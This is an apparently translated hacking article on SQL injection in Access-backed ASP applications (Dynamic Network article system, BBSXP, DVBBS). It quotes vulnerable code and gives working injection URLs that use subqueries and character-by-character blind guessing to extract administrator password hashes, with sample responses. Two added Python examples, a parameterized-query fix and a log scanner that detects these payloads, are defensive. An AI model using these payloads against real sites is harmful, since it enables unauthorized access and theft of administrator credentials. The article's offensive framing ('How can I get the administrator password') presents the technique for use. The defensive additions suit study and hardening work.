SQL Injection with Access


Author: PsKey    Source: gray track

PsKey (PsKey@hotmail.com)
www.isgrey.com

>>> Dedicated this scrap to CaoJing <<<

Many people complain that Access is too weak: it has no comment syntax, it does not support multi-statement (stacked) queries, and so on. On the other hand, many programmers who write database programs on Access review only the code that operates on sensitive tables strictly, while the code that operates on other tables is written very carelessly. This only shows how little we know about Access. Not long ago I was lucky to come across a site dedicated to Access; its forum is divided into many sections, all of them about Access, and I learned a lot there. I am not clever enough to write an overview article, so I would like to explain some of the problems through a few examples:

I. Dynamic Network article system

Involved versions:
All versions of the Dynamic Network article system

Description:
Dynamic Network is an open-source article management system developed and maintained by www.aspsky.net and widely used in China. Because its list.asp does not filter the input submitted by the user before using it in an SQL query, a remote attacker can exploit this to launch SQL injection attacks.

Details:
Related code in list.asp:
-------------------------------------------------------------------------------
SQL = "select Aclass.class, ANclass.nclass, article.title, article.classid, article.nclassid from article, Aclass, ANclass where article.classid=Aclass.classid and article.nclassid=ANclass.nclassid and article.articleID=" & request("id")
-------------------------------------------------------------------------------

The id is placed directly into the SQL query without any check. That is easy to see, but when it comes to exploitation some friends get stuck: the table behind this statement is article, while the management password is in the admin table, and Access cannot execute multi-statement queries, so what use is this bug? Well, can't we use subqueries? There are many ways:

http://www.target.com/asp/darticle/list.asp?id=(select id from admin where flag=1)

http://www.target.com/asp/darticle/list.asp?id=(select min(id) from admin where flag=1)

http://www.target.com/asp/darticle/list.asp?id=1 and exists (select id from admin where flag=1)

http://www.target.com/asp/darticle/list.asp?id=1 and article.articleID in (select top 1 id from admin where len(password)>1 order by id)

And so on...

How can I get the administrator password :)
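To show why the fix has to be both type validation and parameter binding, here is an added example (not code from the page or from the Dynamic Network project): the concatenated list.asp query above, re-created in Python over an in-memory SQLite database standing in for Access (an assumption; SQLite also accepts subqueries in a value position and also refuses stacked statements in execute()), beside a hardened version. Table and column names follow the page; the rows are constructed.

```python
import sqlite3

# Constructed sample schema with the table and column names the page uses.
# SQLite is an offline stand-in for Access (assumption): like Access it accepts
# a subquery where a number is expected, and execute() refuses stacked statements.
SCHEMA = """
create table article (articleID integer, classid integer, nclassid integer, title text);
create table Aclass (classid integer, class text);
create table ANclass (nclassid integer, nclass text);
create table admin (id integer, username text, password text, flag integer);
insert into article values (1, 1, 1, 'first post');
insert into article values (2, 1, 1, 'second post');
insert into Aclass values (1, 'general');
insert into ANclass values (1, 'misc');
insert into admin values (1, 'guest', 'c0ffee00', 0);   -- constructed hash values
insert into admin values (2, 'admin', 'd3adb33f', 1);
"""

# The page's list.asp query, up to the point where the id is appended.
BASE = ("select Aclass.class, ANclass.nclass, article.title, article.classid, article.nclassid "
        "from article, Aclass, ANclass "
        "where article.classid=Aclass.classid and article.nclassid=ANclass.nclassid "
        "and article.articleID=")


def fresh_db():
    """Build the constructed database in memory."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_unsafe(conn, id_param):
    """Mirror of the page's list.asp line: the request value is glued onto the query unchanged,
    so a value such as "(select min(id) from admin where flag=1)" runs against the admin table."""
    return conn.execute(BASE + id_param).fetchone()


def list_safe(conn, id_param):
    """Hardened form: reject anything that is not a plain integer, then bind it as a parameter
    so the database never sees it as SQL text."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute(BASE + "?", (int(id_param),)).fetchone()
```

The type check alone would already stop the page's payloads for this numeric id, but binding is what keeps the query safe when the value is a string, as in the BBSXP username case further down.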

II. BBSXP

Involved versions:
All BBSXP versions

Description:
BBSXP is an open-source ASP forum developed and maintained by www.bbsxp.com. Because the security measures adopted by the author are too simple, SQL injection vulnerabilities exist in several files of the forum; an illegal user can quickly crack any user's password or carry out other malicious attacks.

Details:
Not long ago I wrote an article about BBSXP vulnerabilities. The author simply upgraded the forum, but still did not completely solve the SQL injection problem, for example:
Bank.asp
-------------------------------------------------------------------------------
SQL = "select * from user where username='" & request("dxname") & "'"
rs1.Open SQL, Conn
if rs1.eof then
    message = message & "<li>The account of this person was not found!"
end if
-------------------------------------------------------------------------------
Well, every user password in the user table is there for the taking, but some people start to mutter: the BBSXP back-end management password is different from the forum front-end password, so what should I do?
The back-end password is stored in the clubconfig table, and it is reached the same way as above: use subqueries.
Here is an example:
Searchok.asp
-------------------------------------------------------------------------------
forumid = Request("forumid")
...
if Request("forumid") <> "" then
    forumidor = "forumid=" & forumid & " and "
end if
...
SQL = "select * from forum where deltopic<>1 and " & forumidor & " " & item & " " & TimeLimit & " order by lasttime desc"
...
-------------------------------------------------------------------------------
Submit a URL similar to the following (it is best to write a small program to send this request):
http://www.target.com/bbsxp165/bbsxp/searchok.asp?search=author&searchxm=username&forumid=(select%20count(administrators)%20from%20clubconfig%20where%20len(adminpassword)>1)
Look, haven't we started querying the clubconfig table?

III. Severe vulnerabilities in the Dynamic Network forum (DVBBS) (supplement)
After I published this vulnerability, many friends wrote to me asking how to crack the MD5 hash (is cracking it really necessary?). Some wanted to test the code, some wanted to make a tutorial animation... some also said that the back-end management password is different from the forum front-end password, so how do we get the back-end password? I guess these friends have not thought about it much themselves; wouldn't it be nicer to think it through? I will add how to obtain the MD5-hashed back-end management password:

http://www.target.com/dv/tongji.asp?orders=2&n=2%20(select%20max(id)%20from%20admin),
Return value:
-------------------------------------------------------------------------------
document.write(□);document.write(9);document.write(
);document.write(□);document.write(9);document.write(
);
-------------------------------------------------------------------------------

http://www.target.com/dv/tongji.asp?orders=2&n=2%20(select%20max(id)%20from%20admin%20where%20left(password,1)=),
Return value:
-------------------------------------------------------------------------------
document.write(□);document.write();document.write(
);document.write(□);document.write();document.write(
);
-------------------------------------------------------------------------------
Ah, it is blank, so we guessed wrong. Try again:

http://www.target.com/dv/tongji.asp?orders=2&n=2%20(select%20max(id)%20from%20admin%20where%20left(password,1)=d),
Return value:
-------------------------------------------------------------------------------
document.write(□);document.write(9);document.write(
);document.write(□);document.write(9);document.write(
);
-------------------------------------------------------------------------------
Haha, that one is right.
Continue in the same way for the remaining characters. Of course, the small program I wrote before can be used here with a slight modification!

But let me remind you that the DVBBS back-end file management uses cookie + session dual authentication!

Note: I randomly downloaded a few programs from the source-code download sites, including forums, guestbooks, and article and download management systems, and found similar problems in them. In fact, as long as we are careful, these problems need not occur at all!
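Since the three applications above share one request pattern (a subquery or an Access string function inside a value that should be a number or a name), the server side can spot the attempts in its web logs. The following is an added example, not part of the original article: a small Python scanner over constructed IIS-style W3C log lines, decoding each query parameter and flagging the tokens the page's requests rely on. The log lines and field layout are constructed; the parameter names follow the page.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed IIS-style log lines (W3C fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
2004-05-01 10:00:01 10.0.0.5 GET /dv/tongji.asp orders=2&n=2%20(select%20max(id)%20from%20admin%20where%20left(password,1)=d), 200
2004-05-01 10:00:02 10.0.0.5 GET /asp/darticle/list.asp id=1 200
2004-05-01 10:00:03 10.0.0.7 GET /asp/darticle/list.asp id=1%20and%20exists(select%20id%20from%20admin%20where%20flag=1) 200
2004-05-01 10:00:04 10.0.0.9 GET /bbsxp/searchok.asp search=author&searchxm=username&forumid=(select%20count(administrators)%20from%20clubconfig%20where%20len(adminpassword)>1) 200
"""

# Tokens the page's Access payloads depend on: a subquery inside a value, an EXISTS test,
# and the string functions used for character-by-character guessing.
PATTERNS = {
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "exists": re.compile(r"\bexists\s*\(", re.I),
    "string_fn": re.compile(r"\b(left|mid|len|asc)\s*\(", re.I),
}


def analyse_query(query):
    """Return {param: [indicator, ...]} for every parameter whose decoded value trips a pattern."""
    hits = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote_plus(value)  # parse_qsl already decodes once; a second pass catches double encoding
        found = [key for key, rx in PATTERNS.items() if rx.search(decoded)]
        if found:
            hits[name] = found
    return hits


def scan_log(text):
    """Return (client_ip, uri_stem, hits) for every line whose query string looks injected."""
    results = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed or truncated line, skip rather than crash
        _date, _time, ip, _method, stem, query = fields[:6]
        hits = analyse_query(query)
        if hits:
            results.append((ip, stem, hits))
    return results
```

Normal traffic such as id=1 produces no hit, so the output can feed an alert on the parameter name and client address.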
